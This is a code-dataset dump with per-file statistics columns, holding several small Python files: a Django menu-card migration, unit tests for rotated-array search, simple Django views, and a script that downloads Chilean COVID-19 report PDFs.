| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1f5755adc834fa964d8b57abac91fbc6499d9935
| 4,608
|
py
|
Python
|
menucard/migrations/0001_initial.py
|
baniasbaabe/happy-qr
|
bf44ac19306ea6405cc7c9a100e6f83afca125b4
|
[
"MIT"
] | 1
|
2021-01-23T21:42:10.000Z
|
2021-01-23T21:42:10.000Z
|
menucard/migrations/0001_initial.py
|
baniasbaabe/happy-qr
|
bf44ac19306ea6405cc7c9a100e6f83afca125b4
|
[
"MIT"
] | null | null | null |
menucard/migrations/0001_initial.py
|
baniasbaabe/happy-qr
|
bf44ac19306ea6405cc7c9a100e6f83afca125b4
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.2 on 2020-12-27 10:36
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
initial = True
dependencies = [
('crm', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Vorspeise',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='Snacks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='Nachspeise',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='Hauptspeise',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='Besucher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vorname', models.CharField(max_length=45)),
('nachname', models.CharField(max_length=45)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('telefon', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, null=True, region=None)),
('strasse', models.CharField(max_length=45)),
('hausnummer', models.CharField(max_length=5)),
('plz', models.CharField(max_length=45)),
('stadt', models.CharField(max_length=45)),
('besucht_am', models.DateTimeField(auto_now_add=True, null=True)),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='AlkoholhaltigeDrinks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('centiliter', models.FloatField()),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='AlkoholfreieDrinks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('liter', models.FloatField()),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
]
| 48
| 128
| 0.567491
| 449
| 4,608
| 5.701559
| 0.195991
| 0.049219
| 0.084375
| 0.1125
| 0.771484
| 0.720703
| 0.720703
| 0.720703
| 0.720703
| 0.720703
| 0
| 0.014449
| 0.27908
| 4,608
| 95
| 129
| 48.505263
| 0.756171
| 0.009766
| 0
| 0.681818
| 1
| 0
| 0.09647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034091
| 0
| 0.079545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f3f7fbb2e9c92a49ae40445269e03dc87f8856d
| 185
|
py
|
Python
|
tsai/data/basics.py
|
radi-cho/tsai
|
32f24d55ee58df1a14d1e68618f230097a266c77
|
[
"Apache-2.0"
] | 1
|
2022-01-02T18:21:27.000Z
|
2022-01-02T18:21:27.000Z
|
tsai/data/basics.py
|
radi-cho/tsai
|
32f24d55ee58df1a14d1e68618f230097a266c77
|
[
"Apache-2.0"
] | 31
|
2021-12-01T23:08:51.000Z
|
2021-12-29T02:59:49.000Z
|
tsai/data/basics.py
|
radi-cho/tsai
|
32f24d55ee58df1a14d1e68618f230097a266c77
|
[
"Apache-2.0"
] | 1
|
2022-03-13T16:47:04.000Z
|
2022-03-13T16:47:04.000Z
|
from .validation import *
from .preparation import *
from .external import *
from .core import *
from .preprocessing import *
from .transforms import *
from .mixed_augmentation import *
| 26.428571
| 33
| 0.778378
| 22
| 185
| 6.5
| 0.454545
| 0.41958
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145946
| 185
| 7
| 33
| 26.428571
| 0.905063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2f59b443158d106a76a2bebe88570da44bbc0fe9
| 5,838
|
py
|
Python
|
tests/tests_rotated_array_search.py
|
quervernetzt/find-value-in-rotated-sorted-array
|
b391b1502fd326a57973621500e984bf6f7df44a
|
[
"MIT"
] | null | null | null |
tests/tests_rotated_array_search.py
|
quervernetzt/find-value-in-rotated-sorted-array
|
b391b1502fd326a57973621500e984bf6f7df44a
|
[
"MIT"
] | null | null | null |
tests/tests_rotated_array_search.py
|
quervernetzt/find-value-in-rotated-sorted-array
|
b391b1502fd326a57973621500e984bf6f7df44a
|
[
"MIT"
] | null | null | null |
import unittest
from solution.rotated_array_search import RotatedArraySearch
class TestCasesRotatedArraySearch(unittest.TestCase):
def input_list_is_none_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = None
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_is_empty_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = []
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_has_one_element_nonmatching_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [2]
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_has_one_element_matching_return_zero(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [2]
target: int = 2
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 0)
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
def input_list_with_multiple_elements_no_pivot_nonmatching_even_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [1,4,5,8,23,50]
target: int = 15
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_with_multiple_elements_no_pivot_matching_even_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [1,4,5,8,23,50]
target: int = 23
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 4)
def input_list_with_multiple_elements_no_pivot_nonmatching_odd_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [1,4,5,8,23,50,51]
target: int = 15
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_with_multiple_elements_no_pivot_matching_odd_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [1,4,5,8,23,50,51]
target: int = 23
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 4)
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
def input_list_with_multiple_elements_pivot_nonmatching_even_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [6,8,23,50,-10,-8,0,1,4,5]
target: int = 15
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_with_multiple_elements_pivot_matching_even_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [6,8,23,50,-10,-8,0,1,4,5]
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 7)
def input_list_with_multiple_elements_pivot_nonmatching_odd_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [6,8,23,50,-10,-8,0,1,4]
target: int = 15
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_with_multiple_elements_pivot_matching_odd_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [6,8,23,50,-10,-8,0,1,4]
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 7)
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
def input_list_with_multiple_elements_pivot_matching_edge_cases_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list_0: list = [-8,0,1,4,6,8,23,50,-10]
input_list_1: list = [50,-10,-8,0,1,4,6,8,23]
target: int = 1
# Act
index_0: int = rotated_array_search.main(input_list_0, target)
index_1: int = rotated_array_search.main(input_list_1, target)
# Assert
self.assertEqual(index_0, 2)
self.assertEqual(index_1, 4)
| 33.94186
| 107
| 0.601918
| 655
| 5,838
| 5.045802
| 0.087023
| 0.111649
| 0.152496
| 0.088956
| 0.92708
| 0.920424
| 0.908926
| 0.88351
| 0.881089
| 0.870197
| 0
| 0.034623
| 0.243063
| 5,838
| 172
| 108
| 33.94186
| 0.713284
| 0.11408
| 0
| 0.690476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.154762
| false
| 0
| 0.02381
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f8e310bf9e77d36d1ba6cf080e2e966d1ebdb66
| 63
|
py
|
Python
|
gira_homeserver_api/devices/value_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 5
|
2020-03-17T12:45:50.000Z
|
2022-03-07T10:55:50.000Z
|
gira_homeserver_api/devices/value_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 3
|
2020-04-17T09:53:45.000Z
|
2021-01-25T22:14:14.000Z
|
gira_homeserver_api/devices/value_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 1
|
2020-04-17T06:51:50.000Z
|
2020-04-17T06:51:50.000Z
|
from .device import Device
class ValueDevice(Device):
pass
| 15.75
| 26
| 0.761905
| 8
| 63
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174603
| 63
| 4
| 27
| 15.75
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
85f0ac57ac9d5511f94d39253027463025311137
| 194
|
py
|
Python
|
tests/api/utils/test_config.py
|
Devansh3712/py-cmc
|
e3f9687914d92cd95bd5a7c04e6103345ba43a3d
|
[
"MIT"
] | 2
|
2022-02-14T07:13:12.000Z
|
2022-02-14T07:20:34.000Z
|
tests/api/utils/test_config.py
|
Devansh3712/py-cmc
|
e3f9687914d92cd95bd5a7c04e6103345ba43a3d
|
[
"MIT"
] | 6
|
2022-02-21T10:50:43.000Z
|
2022-03-03T15:44:09.000Z
|
tests/api/utils/test_config.py
|
Devansh3712/py-cmc
|
e3f9687914d92cd95bd5a7c04e6103345ba43a3d
|
[
"MIT"
] | 2
|
2022-02-20T01:43:35.000Z
|
2022-03-13T09:34:51.000Z
|
from api.utils.config import settings
def test_config_validation() -> None:
assert type(settings.host) == str
assert type(settings.port) == int
assert type(settings.expire) == int
| 24.25
| 39
| 0.71134
| 26
| 194
| 5.230769
| 0.653846
| 0.220588
| 0.397059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175258
| 194
| 7
| 40
| 27.714286
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.2
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c83ceb2eaee488074f590ced585bdeba5d992e16
| 589
|
py
|
Python
|
main/views.py
|
climsoft/climsoftweb
|
3be127b3c8ce0e1f89940139ea19e17d20abe386
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T07:43:18.000Z
|
2021-08-17T07:43:18.000Z
|
main/views.py
|
climsoft/climsoftweb
|
3be127b3c8ce0e1f89940139ea19e17d20abe386
|
[
"BSD-3-Clause"
] | 45
|
2019-11-16T16:59:04.000Z
|
2021-04-08T21:23:48.000Z
|
main/views.py
|
climsoft/climsoftweb
|
3be127b3c8ce0e1f89940139ea19e17d20abe386
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
@login_required
def mainmenu(request):
return render(request, 'main/mainmenu.html', {})
@login_required
def user_admin(request):
return render(request, 'main/user_admin.html', {})
@login_required
def user_profile(request):
return render(request, 'main/user_profile.html', {})
@login_required
def change_password(request):
return render(request, 'main/change_password.html', {})
@login_required
def language(request):
return render(request, 'main/language.html', {})
| 21.814815
| 59
| 0.752122
| 74
| 589
| 5.824324
| 0.297297
| 0.180974
| 0.185615
| 0.301624
| 0.477958
| 0.157773
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122241
| 589
| 26
| 60
| 22.653846
| 0.833656
| 0
| 0
| 0.294118
| 0
| 0
| 0.174873
| 0.079796
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0.117647
| 0.117647
| 0.294118
| 0.705882
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
c859d195756534de10c20a9266677539c86f42d2
| 72
|
py
|
Python
|
small-problems/fibonacci-sequence/fib1.py
|
Prateek2506/classic-cs-problems
|
fa0e3c86fb7cd478888bb90006f7379cc6c7a38b
|
[
"MIT"
] | null | null | null |
small-problems/fibonacci-sequence/fib1.py
|
Prateek2506/classic-cs-problems
|
fa0e3c86fb7cd478888bb90006f7379cc6c7a38b
|
[
"MIT"
] | null | null | null |
small-problems/fibonacci-sequence/fib1.py
|
Prateek2506/classic-cs-problems
|
fa0e3c86fb7cd478888bb90006f7379cc6c7a38b
|
[
"MIT"
] | null | null | null |
def fib1(n: int) -> int:
return fib1(n-1) + fib1(n-2)
print(fib1(5))
| 24
| 32
| 0.583333
| 15
| 72
| 2.8
| 0.6
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118644
| 0.180556
| 72
| 3
| 33
| 24
| 0.59322
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
c091621b5f0a091f64683171c4c8e2bb52a88c66
| 155
|
py
|
Python
|
lambda_handlers/validators/__init__.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
lambda_handlers/validators/__init__.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
lambda_handlers/validators/__init__.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
from .jsonschema_validator import JSONSchemaValidator as jsonschema # noqa
from .marshmallow_validator import MarshmallowValidator as marshmallow # noqa
| 51.666667
| 78
| 0.858065
| 16
| 155
| 8.1875
| 0.5625
| 0.229008
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116129
| 155
| 2
| 79
| 77.5
| 0.956204
| 0.058065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c0c65039eac0d1c182008b9f53dbb8727df88022
| 151
|
py
|
Python
|
home/views.py
|
kerol/kerolgaodotcom
|
7993bb5f40dd1f6b3ebdef4d90728cd77651c026
|
[
"BSD-3-Clause"
] | 1
|
2016-03-02T02:49:00.000Z
|
2016-03-02T02:49:00.000Z
|
home/views.py
|
kerol/kerolgaodotcom
|
7993bb5f40dd1f6b3ebdef4d90728cd77651c026
|
[
"BSD-3-Clause"
] | null | null | null |
home/views.py
|
kerol/kerolgaodotcom
|
7993bb5f40dd1f6b3ebdef4d90728cd77651c026
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf8 -*-
from django.shortcuts import render
# Create your views here.
def index(request):
return render(request, 'about.html')
| 15.1
| 40
| 0.682119
| 19
| 151
| 5.421053
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00813
| 0.18543
| 151
| 9
| 41
| 16.777778
| 0.829268
| 0.298013
| 0
| 0
| 0
| 0
| 0.098039
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
f19cbc9fa4b054f10523c99c5ea25ef1f89616fb
| 26
|
py
|
Python
|
port/boost/__init__.py
|
happyxianyu/fxpkg
|
6d69f410474e71518cc8c6291892dd069c357c75
|
[
"Apache-2.0"
] | null | null | null |
port/boost/__init__.py
|
happyxianyu/fxpkg
|
6d69f410474e71518cc8c6291892dd069c357c75
|
[
"Apache-2.0"
] | null | null | null |
port/boost/__init__.py
|
happyxianyu/fxpkg
|
6d69f410474e71518cc8c6291892dd069c357c75
|
[
"Apache-2.0"
] | null | null | null |
from .main import MainPort
| 26
| 26
| 0.846154
| 4
| 26
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f1b716086bee59aea60d9505833a19bb60e79bc5
| 161
|
py
|
Python
|
smart_note_diploma/core/urls.py
|
yerkebulan19971212/dipploma
|
d274088aa477dadd7971950b80ef9ea3ea366a6b
|
[
"MIT"
] | null | null | null |
smart_note_diploma/core/urls.py
|
yerkebulan19971212/dipploma
|
d274088aa477dadd7971950b80ef9ea3ea366a6b
|
[
"MIT"
] | null | null | null |
smart_note_diploma/core/urls.py
|
yerkebulan19971212/dipploma
|
d274088aa477dadd7971950b80ef9ea3ea366a6b
|
[
"MIT"
] | null | null | null |
from django.urls import path
from .api.view import get_all_countries_view
app_name = "core"
urlpatterns = [
path('all-countries', get_all_countries_view)
]
| 20.125
| 49
| 0.770186
| 24
| 161
| 4.875
| 0.583333
| 0.307692
| 0.25641
| 0.324786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136646
| 161
| 7
| 50
| 23
| 0.841727
| 0
| 0
| 0
| 0
| 0
| 0.10559
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
7b2f67783a54c7281fccbf52bb33f6fc8f65fc62
| 482
|
py
|
Python
|
tests/individual_samples/long_doc.py
|
MiWeiss/docstr_coverage
|
502ab0174ea261383f497af2476317d4cc199665
|
[
"MIT"
] | 50
|
2019-01-25T16:53:39.000Z
|
2022-03-17T22:02:06.000Z
|
tests/individual_samples/long_doc.py
|
HunterMcGushion/docstr_coverage
|
502ab0174ea261383f497af2476317d4cc199665
|
[
"MIT"
] | 66
|
2019-01-25T11:45:43.000Z
|
2022-03-30T11:55:47.000Z
|
tests/individual_samples/long_doc.py
|
MiWeiss/docstr_coverage
|
502ab0174ea261383f497af2476317d4cc199665
|
[
"MIT"
] | 23
|
2019-01-28T08:37:42.000Z
|
2021-06-16T12:35:27.000Z
|
"""
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
"""
class A:
"""This is the first class in the alphabeth."""
# docstr-coverage:excused `test ignore after long docstrings`
def ignored(self):
pass
def missing(self):
pass
| 20.083333
| 65
| 0.707469
| 80
| 482
| 4.2625
| 0.2875
| 0.175953
| 0.184751
| 0.290323
| 0.633431
| 0.633431
| 0.633431
| 0.633431
| 0.633431
| 0.633431
| 0
| 0
| 0.240664
| 482
| 23
| 66
| 20.956522
| 0.931694
| 0.773859
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
9e5f866f7cec9044c5ffc4636fdb2a689ffe67a2
| 3,221
|
py
|
Python
|
src/pdfDownloader.py
|
dna33/covid19-pdfocr
|
66f11fc7eb3d4f0146d04344a112578bc3149a02
|
[
"MIT"
] | 1
|
2021-08-16T22:21:30.000Z
|
2021-08-16T22:21:30.000Z
|
src/pdfDownloader.py
|
dna33/covid19-pdfocr
|
66f11fc7eb3d4f0146d04344a112578bc3149a02
|
[
"MIT"
] | null | null | null |
src/pdfDownloader.py
|
dna33/covid19-pdfocr
|
66f11fc7eb3d4f0146d04344a112578bc3149a02
|
[
"MIT"
] | null | null | null |
import urllib3
from bs4 import BeautifulSoup
import shutil
import re
import os
def obtenerReporteDiario(reporte_url, path):
req = urllib3.PoolManager()
res = req.request('GET', reporte_url)
soup = BeautifulSoup(res.data, features="html.parser")
pdfs = []
for link_soup in soup.find_all('a'):
link = str(link_soup.get('href'))
regex_pdf = re.compile(r"(reporte_covid19)[\w\-]*\.pdf", re.IGNORECASE)
pdf_match = re.search(regex_pdf, link)
if pdf_match:
pdf_file = f'{path}{os.path.basename(link)}'
if not os.path.isfile(pdf_file):
with req.request('GET', link, preload_content=False) as res, open(pdf_file, 'wb') as pfopen:
shutil.copyfileobj(res, pfopen)
pdfs.append(os.path.basename(link))
else:
print(pdf_file + ' already downloaded ')
return pdfs
def obtenerInformeEpidemiologico(reporte_url, path):
req = urllib3.PoolManager()
res = req.request('GET', reporte_url)
soup = BeautifulSoup(res.data, features="html.parser")
pdfs = []
for link_soup in soup.find_all('a'):
link = str(link_soup.get('href'))
#regex_pdf = re.compile(r"(informe|reporte)[\w\-]*\.pdf", re.IGNORECASE)
regex_pdf = re.compile(r"(epi|ep_)[\w\-]*\.pdf", re.IGNORECASE)
pdf_match = re.search(regex_pdf, link)
if pdf_match:
pdf_file = f'{path}{os.path.basename(link)}'
if not os.path.isfile(pdf_file):
print('Downloading ' + pdf_file)
with req.request('GET', link, preload_content=False) as res, open(pdf_file, 'wb') as pfopen:
shutil.copyfileobj(res, pfopen)
pdfs.append(os.path.basename(link))
else:
print(pdf_file + ' already downloaded ')
return pdfs
def obtenerSituacionCOVID19(reporte_url, path):
req = urllib3.PoolManager()
res = req.request('GET', reporte_url)
soup = BeautifulSoup(res.data, features="html.parser")
pdfs = []
for link_soup in soup.find_all('a'):
link = str(link_soup.get('href'))
regex_pdf = re.compile(r"(informe|reporte)[\w\-]*\.pdf", re.IGNORECASE)
pdf_match = re.search(regex_pdf, link)
if pdf_match:
pdf_file = f'{path}{os.path.basename(link)}'
if not os.path.isfile(pdf_file):
print('Downloading ' + pdf_file)
with req.request('GET', link, preload_content=False) as res, open(pdf_file, 'wb') as pfopen:
shutil.copyfileobj(res, pfopen)
pdfs.append(os.path.basename(link))
else:
print(pdf_file + ' already downloaded ')
return pdfs
if __name__ == '__main__':
#https://www.minsal.cl/nuevo-coronavirus-2019-ncov/informe-epidemiologico-covid-19/
obtenerInformeEpidemiologico('https://www.gob.cl/coronavirus/cifrasoficiales/', '../input/InformeEpidemiologico/')
obtenerReporteDiario('https://www.gob.cl/coronavirus/cifrasoficiales/', '../input/ReporteDiario/')
obtenerSituacionCOVID19('http://epi.minsal.cl/informes-covid-19/', '../input/InformeSituacionCOVID19/')
| 39.765432
| 118
| 0.616889
| 392
| 3,221
| 4.928571
| 0.227041
| 0.050725
| 0.040373
| 0.055901
| 0.792443
| 0.783126
| 0.783126
| 0.737578
| 0.737578
| 0.737578
| 0
| 0.00861
| 0.242782
| 3,221
| 80
| 119
| 40.2625
| 0.783518
| 0.047501
| 0
| 0.769231
| 0
| 0
| 0.180365
| 0.083496
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046154
| false
| 0
| 0.076923
| 0
| 0.169231
| 0.076923
